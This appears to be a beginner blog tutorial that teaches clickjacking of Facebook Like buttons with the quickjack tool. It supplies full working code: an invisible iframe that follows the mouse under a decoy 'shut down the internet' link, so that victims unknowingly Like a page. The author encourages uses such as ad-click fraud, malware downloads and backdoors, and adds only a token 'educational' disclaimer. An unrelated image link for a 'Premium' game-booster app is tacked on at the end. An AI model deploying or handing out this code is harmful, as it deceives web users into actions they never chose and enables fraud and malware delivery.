by __Matt__ follow him on https://medium.com/@Matt_S
Clickjacking is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
It can be used for many purposes, it all depends on your creativity, let’s do a bit of brainstorming on how to use this technique. You can have a user click on a fake button to get likes, follow you on twitter, click ads, download malware, open a java backdoor or basically click any content that can be embedded, possibilities are endless.
So where to start? Let’s use quickjack tool to get you started, this tool is developed by Samy Kamkar a security researcher famous for his “Samy is a hero worm on MySpace.com”, pretty cool guy, this tool simplify considerably click-jacking without having to code from scratch.
Dificulty level: Noob
Where is the tool? You can download it from Samy’s Git and install it on your server, or use it directly here.
Let’s get busy clickjacking Facebook likes.
What you need:
– Text editor
– Ftp App
– A web server
1. Open a text editor of your choice
2. Create a new file
3. Name it code.html
We need to get the code for the Like button we want our users to click.
Select the page you want to like
– for the sake of it let’s use the default pagehttps://developers.facebook.com/docs/plugins/
– Uncheck “friends faces”
– Uncheck “include
share button”
– Click “Get Code”
Copy the code into code.html and save your file.
<div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.0"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-like" data-href="https://developers.facebook.com/docs/plugins/" data-layout="standard" data-action="like" data-show-faces="false" data-share="false"></div>
Upload the file to your server
it should look like that.
Now go to QuickJackTool
On the textbox insert the url of the code.html page you just created.
Now click on the “Like button”, a red cross should appear on top of it.
click on “I’m done” this should generate a new code on the next page.
Copy the generated code from the text box.
1. Create a new html file.
2. Let’s call it evil.html
3. Paste the code.
<style>body{margin:0px;padding:0px;}</style><div style="overflow:hidden;width:1px;height:1px;position:relative;" id=v> <iframe id="cksl7" name="cksl7" src="http://mattsevely.com/code.html" style="border:0px;left:-44px;top:-20px;position:absolute;filter:alpha(opacity=0);z-index:1;opacity:0;overflow:hidden;width:855px;height:664px;"></iframe> </div><script>var d=document;if(!d.all)d.captureEvents(Event.MOUSEMOVE);d.onmousemove=function(e){var i=d.getElementById("v").style;i.left=d.all?event.clientX+d.body.scrollLeft:e.pageX;i.top=d.all?event.clientY+d.body.scrollTop:e.pageY;};</script> <script src="https://code.jquery.com/jquery-2.1.3.min.js"></script><script>$(function(){var i=-1;$("#cksl7").hover(function(){i=$(this).closest("#v").attr("qjid");},function(){i=-1;});$(window).focus();$(window).blur(function(){document.getElementById("v").style.visibility="hidden";});});$(window).focus()</script>
3. Add the following code right after the code you just pasted into your evil.html this is the visual link that the user will click (reddit.com is where the user will be redirected after clicking the “evil” link that will make him like the page.
<a href="http://reddit.com"> click here to shut down the internet </a>
4. Save the evil.html file and upload to your server (same folder as code.html)
You are done!
The result will be this.
So when the user click one time “Click to shut down the internet” it is actually Liking the facebook plugins page, and since the link didn’t appear to “work” the user will instintivly click again, on the second click the user is redirected to Reddit.com.
REMEMBER: to unlike the Facebook plugins page that you “liked” , if you clicked on the “evil” link.
This tutorial is strictly for educational purposes, the way you use that tool is solely your responsibility. Not mine, nor Samy’s.
Have fun.
![Game Booster | Bug Fix & Lag Fix v5.6rs [Premium]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDNlV_bBqFQFY4IsW692wFsNvExC_0iWRugXUq31vqgokitWU8bbZ3AQHVr_IVn3UONl2mUKWtPXdglvaxvZ06pYjU-Nu9ISxVjDm7JxVfJsek2DSNq1ijaT3C5JHQ5TjjOhKAC4hEEG8/w680/Screenshot_2021-01-30-17-01-59-77.jpg)
